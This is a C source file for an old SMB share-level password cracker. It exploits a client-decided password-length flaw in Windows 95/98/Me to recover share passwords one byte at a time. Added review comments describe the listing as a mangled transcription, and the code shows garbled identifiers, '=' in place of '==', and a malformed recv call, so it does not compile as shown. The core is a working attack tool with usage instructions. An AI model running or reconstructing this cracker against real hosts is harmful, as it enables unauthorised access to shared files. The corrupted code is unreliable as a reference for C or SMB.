/* SMB. c Last edited Thu Nov 15 11:10:36 CET 2001 by Noah
*
* SMB sharelevel cracker by snuggl@hack.se
* Usage: SMB 192.168.0.1 // netbiosname/sharename
*
* This works with a bug in MS Implementation of the SMB sharelevel password scheme
* Where it is the client that decides how many chars in the passwords that should be validated.
* Works with Windows 95/08/Me, (maybe NT/2 K with sharelvl security ?)
* MS has released a patch for it.
*
* Todo-fixa automagisk IP-> NetBIOS Translation
*-Fixa listning AV shares F contains N multicast nd IP adress
*-Fixa s? Den Kan sweepa HNA n ERK =)
*
* V0.2-> v0.3: patch by noah@hd.se
* Added-H argument for Hollywood stylee output
*
*/
# Include <stdio. h>
# Include <string. h>
# Include <sys/types. h>
// # Include <sys/socket. h>
// # Include <netinet/in. h>
// # Include <netdb. h>
# Define smb_port 139
/*
 * File-scope state shared by make_smb_session, make_smb_packet and main.
 * NOTE(review): this listing is a mangled transcription (capitalised keywords,
 * identifiers split or replaced, `==` rendered as `=`, `\n` rendered as `/N`)
 * and does not compile as shown; the comments describe what the visible text does.
 */
// Session identifier read back from bytes 32..33 of the first server reply in
// make_smb_session and echoed into SMB[32..33] by make_smb_packet.
Long secret_number;
// The "//host/share" argument copied from argv[2] in main. The same global is
// referenced under several mangled names below (`export _name`, `pai_name`,
// `partition _name`, `distinct _name`, `using _name`) -- presumably one
// identifier in the original source; confirm against a clean copy.
Char comment _name [100];
// Candidate password being built up one byte at a time by main's loop.
// Nothing caps the index used in main at sizeof passwd.
Char passwd [100];
// Outgoing packet assembled by make_smb_packet and sent from main.
Char SMB [512];
// Receive buffer for server replies (both functions recv into it).
Char slask [8192];
/*
 * make_smb_session: builds and sends a NetBIOS session request for the name
 * parsed out of the global share argument, reads the reply, then sends a
 * login packet carrying `name` and `passwd` and returns the byte at offset 9
 * of the second reply (main treats a non-zero return as failure).
 *
 * Return values are inconsistent: send/recv failures on the session request
 * return 0 (lines "cant send Session Request" / "cant Recv session info"),
 * which main reads as success, while failures on the login exchange return -1.
 *
 * NOTE(review): mangled transcription -- see the comment on the globals above.
 * Nothing below checks how many bytes recv() returned before indexing into
 * the reply buffer.
 */
Int make_smb_session (INT socket, char * Name, char * passwd ){
Int I;
Int J = 0;
Int Len;
Char netbios_name [100];
Char netbios_form [100];
Char session [512];
Char data [8192];
Char temp [2];
Int lp_len, lp_raw_len, lp_high, lp_low;
Int lp_raw_high, lp_raw_low;
Int pass_len, pass_len_low, pass_len_high;
Memset (Session, 0, sizeof (Session ));
Memset (netbios_name, 0, sizeof (netbios_name ));
Memset (netbios_form, 0, sizeof (netbios_form ));
// Copy the host part of the share argument (skipping the leading two
// characters) into netbios_name, stopping at the next separator or at 100.
// The loop condition uses a single `&`; presumably `&&` in the original.
For (I = 2; I <100 & export _name [I]! = '//'; I ++)
Netbios_name [I-2] = pai_name [I];
# Ifdef debug
Printf ("using NetBIOS name =/" % S/"/N", netbios_name );
# Endif
// Encode the NetBIOS name into its two-characters-per-byte form: each byte
// becomes (byte / 16 + 'A') followed by (byte % 16 + 'A'); positions past the
// name's length are filled with the pair 'C','A' (the encoding of a space).
// Always produces 16 pairs, so J ends at 32.
Len = strlen (netbios_name );
For (I = 0; I <16; I ++ ){
If (I <Len ){
Temp [0] = netbios_name [I]/16 + 65;
Temp [1] = netbios_name [I] % 16 + 65;
}
Else {
Temp [0] = 'C ';
Temp [1] = 'a ';
}
Netbios_form [J] = temp [0];
Netbios_form [J + 1] = temp [1];
J + = 2;
}
// The encoded NetBIOS name is ready.
// Session request header: type byte 0x81, length byte at [3], then the
// encoded called name framed by a 0x20 on either side.
Session [0] = 0x81;
Session [3] = 0x48;
Session [4] = 0x20; // one space before the name
Memcpy (& session [5], netbios_form, J );
Session [6 + J] = 0x20; // one space after the name
// Calling name. NOTE(review): the literal as shown is 25 bytes (incl. the
// trailing space) but 32 bytes are copied from netbios_form, so the tail of
// the copy is whatever the encoding loop left there -- likely a transcription
// loss in the literal; confirm against a clean copy.
Sprintf (netbios_form, "cacacacacacacacacacacaaa ");
Memcpy (& session [7 + J], netbios_form, 32 );
# Ifdef debug
// Debug output reports 7 + J, but 37 + J bytes are actually sent below.
Printf ("sending session request. (packet Len = % I)/n", 7 + J );
# Endif
If (send (socket, session, 37 + J, 0) =-1 ){
Printf ("error: cant send Session Request./N ");
// Returns 0 on failure; main interprets 0 as success.
Return 0;
}
Memset (slask, 0,8192 );
# Ifdef debug
Printf ("recieving session info. (If you are running this against a Samba server, it will stay here forever)/n ");
# Endif
// Blocking recv with no timeout (the debug message above admits as much).
If (Recv (socket, slask, 8192, 0) =-1 ){
Printf ("error: cant Recv session info/N ");
Return 0;
}
# Ifdef debug
// strlen on a binary reply: stops at the first zero byte, not the real length.
Printf ("got session info. (packet Len = % I)/n", strlen (slask ));
# Endif
// Reads bytes 32..33 without checking that at least 34 bytes arrived. slask
// is plain char, so on platforms where char is signed these values sign-extend.
Secret_number = slask [33] * 256 + slask [32];
# Ifdef debug
Printf ("calculating number =/" % x/"/N", secret_number );
Printf ("got response/" % x/"/N", slask [0]);
# Endif
// 0xffffff82 is 0x82 sign-extended: this comparison only works because
// slask[0] is a signed char; comparing against (unsigned char)0x82 would be
// the portable form.
If (slask [0]! = 0xffffff82 ){
Printf ("error: There is no SMB server on port % I/N", smb_port );
Return 0;
}
// Length fields for the login packet: the raw payload is name + NUL +
// passwd + NUL; the framed length adds 55 bytes of header.
Lp_raw_len = strlen (name) + 1 + strlen (passwd) + 1;
Lp_len = lp_raw_len + 55;
Lp_raw_high = lp_raw_len/256;
Lp_high = lp_len/256;
Lp_raw_low = lp_raw_len % 256;
Lp_low = lp_len % 256;
Pass_len = strlen (passwd) + 1;
// NOTE(review): `Pass_len_height` and `fig` are mangled forms of
// pass_len_high / pass_len (declared above); as written these lines do not
// refer to any declared variable.
Pass_len_height = pass_len/256;
Pass_len_low = fig % 256;
Memset (data, 0, sizeof (data ));
// Fixed header bytes. data[2..3] is the length stored high byte first;
// data[51..52] and data[57..58] are stored low byte first.
Data [2] = lp_high;
Data [3] = lp_low;
Data [4] = 0xff;
Data [5] = 0x53;
Data [6] = 0x4d;
Data [7] = 0x42;
Data [8] = 0x73;
Data [13] = 0x18;
Data [14] = 0x01;
Data [15] = 0x20;
Data [31] = 0x28;
Data [36] = 0x0a;
Data [37] = 0xff;
Data [41] = 0x04;
Data [42] = 0x11;
Data [43] = 0x02;
Data [51] = pass_len_low;
Data [52] = pass_len_high;
Data [57] = lp_raw_low;
Data [58] = lp_raw_high;
// Payload: passwd at 59, a zero byte (from the memset), then name. The only
// bound on these copies is the 8192-byte size of data; the caller passes
// short literals.
Memcpy (& Data [59], passwd, strlen (passwd ));
Memcpy (& Data [60 + strlen (passwd)], name, strlen (name ));
# Ifdef debug
Printf ("sending Login Sequence./N ");
# Endif
// Failure here returns -1, unlike the 0 returned by the failures above.
If (send (socket, Data, lp_raw_len + 59,0) =-1)
Return-1;
# Ifdef debug
Printf ("recieving login info./N ");
# Endif
// NOTE(review): this recv has three arguments as shown, unlike the other
// recv calls which pass a buffer length -- presumably a transcription error.
// data[9] below is read regardless of how many bytes arrived.
If (Recv (socket, Data, 0) =-1)
Return-1;
# Ifdef debug
Printf ("got response =/" % x/"/N", data [9]);
# Endif
// Status byte of the reply; 0 is taken as success by main.
Return (data [9]);
}
/*
 * make_smb_packet: fills the global SMB buffer with a request carrying
 * `passwd` followed by `share`, echoing the session number captured by
 * make_smb_session into SMB[32..33]. The password length is written by the
 * client at SMB[43]; the file header identifies this client-supplied length
 * as the flaw the tool relies on.
 *
 * No bounds check: the only thing keeping the copies inside SMB[512] is that
 * main passes two 100-byte globals. Both arguments must be NUL-terminated.
 * NOTE(review): mangled transcription -- `SHARE` and `share` are presumably
 * the same parameter, and the empty character literal at SMB[15] cannot be
 * what the original contained (make_smb_session stores 0x20 at the same
 * offset; confirm against a clean copy).
 */
Void make_smb_packet (const char * share, const char * passwd ){
Memset (SMB, 0, sizeof (SMB ));
SMB [4] = 0xff;
SMB [5] ='s ';
SMB [6] = 'M ';
SMB [7] = 'B ';
SMB [8] = 'U ';
SMB [13] = 0x18;
SMB [14] = 0x01;
SMB [15] = '';
SMB [31] = 0x28;
// Session number stored low byte first; truncation to char is implicit.
SMB [32] = secret_number %256;
SMB [33] = secret_number/256;
SMB [36] = 0x04;
SMB [37] = 0xff;
// Length of the password, then length of password + share name.
SMB [43] = strlen (passwd); // Here lies the whole bug (original author's remark)
SMB [45] = strlen (passwd) + strlen (SHARE) + 1;
// Payload: passwd, then share, then the two trailing bytes 0x41 0x3a ("A:").
Memcpy (& SMB [47], passwd, strlen (passwd ));
Memcpy (& SMB [47 + strlen (passwd)], share, strlen (SHARE ));
SMB [48 + strlen (passwd) + strlen (SHARE)] = 0x41;
SMB [49 + strlen (passwd) + strlen (SHARE)] = 0x3a;
// Packet size byte; main sends strlen(share) + strlen(passwd) + 51 bytes,
// i.e. four more than the value recorded here.
SMB [3] = strlen (passwd) + strlen (SHARE) + 47;
}
/*
 * main: parses "[-h] host //host/share", resolves and connects to the host on
 * smb_port, establishes a session with a fixed user/password, then extends
 * the global passwd one byte at a time, sending a packet per candidate byte
 * and inspecting byte 9 of each reply until a position yields no match.
 *
 * NOTE(review): mangled transcription (see the globals above). Several calls
 * used here -- exit, toupper, gethostbyname/htons/socket/connect, usleep,
 * close -- have no matching header in the visible include list (only stdio,
 * string and sys/types are included; the socket headers are commented out).
 * Comparisons appear as `=` where `==` is clearly meant; the memset of `sin`
 * is missing its opening parenthesis as shown.
 */
Int main (INT argc, char ** argv ){
// Spinner characters for the -h display, indexed by I % 4.
Char meter [] = "| /-//";
Int sock;
// Current length of the candidate password (1-based index of the byte being
// tried). Never compared against sizeof passwd.
Int Len = 1;
Int go, I;
Int Hollywood = 0, N;
Struct sockaddr_in sin;
Struct hostent * hostp;
Printf ("/nsmb javascracker v0.3/nby snuggl@hack.se/n ");
If (argc <3 ){
Printf ("Usage: % s [-H] host // host/share/N", argv [0]);
Printf ("/t-h hollywoodstylee output :)/N ");
Printf ("EX: % s 10.0.0.1 // fileserver/files/N", argv [0]);
Exit (-1 );
}
// "-h" shifts argv by one, but argc was checked before the shift: with
// exactly "-h host" the argv[2] read below is the terminating NULL.
If (! Strcmp (argv [1], "-h "))
Argv ++, Hollywood ++;
// strncpy with the full buffer size does not NUL-terminate a 100-byte-or-
// longer argument; the strlen in the loop below would then read past the
// buffer.
Strncpy (using _name, argv [2], 100 );
// Normalise the share argument: '/' becomes the separator character, other
// characters are upper-cased. toupper on a plain char is undefined for
// negative values; a cast to unsigned char would be the portable form.
For (I = 0; I <strlen (distinct _name); I ++)
If (partition _name [I] = '/')
Using _name [I] = '//';
Else
Using _name [I] = toupper (using _name [I]);
// Resolution failure returns -1 silently (no message, no socket yet).
Hostp = gethostbyname (argv [1]);
If (! Hostp) Return-1;
Memset (char *) & sin, 0, sizeof (SIN ));
// bcopy used on a tip from Noah (original author's remark); memcpy would do.
Bcopy (hostp-> h_addr, (char *) & sin. sin_addr, hostp-> h_length );
Sin. sin_family = hostp-> h_addrtype;
Sin. sin_port = htons (smb_port );
# Ifdef debug
Printf ("using adress = % S/nusing Port = % I/N", argv [1], ntohs (SIN. sin_port ));
# Endif
Sock = socket (af_inet, sock_stream, 0 );
If (sock =-1 ){
Printf ("error: cant create socket./N ");
Exit (-1 );
}
Go = connect (sock, (struct sockaddr *) & sin, sizeof (SIN ));
If (go =-1 ){
Printf ("error: cant connect./N ");
Exit (-1 );
}
// Non-zero is treated as failure, but make_smb_session returns 0 for its
// own send/recv failures on the session request, so those go unnoticed here.
If (make_smb_session (sock, "user", "passwd ")){
Printf ("error: cant make SMB session./N ");
Exit (-1 );
}
Memset (passwd, 0, sizeof (passwd ));
Printf ("starting to whack the SMB server (this may take a few seconds on slow connection)/n ");
Fflush (stdout );
Go = 0;
// Outer loop: one iteration per password position. go is set to 1 when a
// position beyond the first yields no match (password complete), 2 when the
// very first position yields no match (nothing worked).
While (! Go ){
For (I = 1; I <= 255; I ++ ){
// Candidate byte for the current position; values that are multiples of
// 10 are skipped, leaving the previous candidate in place for that round.
If (I % 10)
Passwd [len-1] = I;
Make_smb_packet (partition _name, passwd );
// Sends 51 + strlen(share) + strlen(passwd) bytes -- four more than the
// size byte make_smb_packet records at SMB[3].
If (send (sock, SMB, strlen (distinct _name)
+ Strlen (passwd) + 51,0) =-1 ){
Printf ("error: cant send smbpacket./N ");
Return 0;
}
Memset (slask, 0, sizeof (slask ));
// Blocking recv; byte 9 is read regardless of how many bytes arrived.
If (Recv (sock, slask, 8192,0) =-1 ){
Printf ("error: cant Recv smbpacket./N ");
Return 0;
}
// Reply status 0 means the current prefix was accepted: keep this byte and
// move on to the next position.
If (slask [9] = 0 ){
If (! Hollywood)
Printf ("/n> % C/N", I );
Break;
}
Else
// Exhausted all candidates for this position without a match.
If (I = 255 ){
If (Len! = 1) Go = 1;
Else go = 2;
Passwd [len-1] = 0;
Break;
}
// Progress display for -h. NOTE(review): the condition as shown is
// `Hollywood & (I % Len) = 0`, which with C precedence is not a test of
// both conditions; presumably `Hollywood && (I % Len) == 0` originally.
If (Hollywood & (I % Len) = 0 ){
Printf ("/R [% C]/t", meter [I % 4]);
For (n = 0; n <len-1; n ++)
Printf ("% C", passwd [N]);
Fflush (stdout );
Usleep (1000 );
}
}
// Advances unconditionally, including on the final round where go was set.
Len ++;
}
Printf ("/N ");
If (go = 1)
Printf ("work done! Passwd =/"% S/"/N ", passwd );
Else
Printf ("/nsomething did not work, host patched maybe? /N ");
Close (sock );
Return 0;
}